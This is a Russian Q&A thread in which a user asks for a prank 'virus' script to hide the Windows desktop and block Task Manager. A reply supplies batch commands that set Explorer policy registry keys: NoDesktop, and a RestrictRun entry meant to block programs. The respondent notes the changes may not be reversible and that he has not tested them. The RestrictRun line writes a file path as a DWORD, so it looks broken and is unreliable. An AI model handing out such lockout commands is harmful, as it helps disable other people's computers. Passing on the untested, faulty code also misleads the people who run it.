Привет помогите со скриптом

Нкжен скрипт для командной строки чтоб убирался рабочий стол и диспетчера задач не было,я не пытаюсь причинить никому зла я хочу попасть в видео к ютюберу он смотрит вирусы подписчиков!
ПкКомпьютер+2
Георгий Селивончик
Пишу код, интересуюсь наукой, консультирую  · 20 февр 2023
Пробуйте скрипты ниже на свой страх и риск… обратного пути может не быть и не говорите, что я вас не предупреждал.
Для того чтобы убрать рабочий стол.
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Запрещает запускать программы, в том числе можно запретить и диспетчер задач, только укажите правильный путь.
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
Скорее всего надо будет отключить всю возможную защиту винды. Проверить не могу, у меня мак, да и на своем компьютере не стал бы делать такие эксперименты…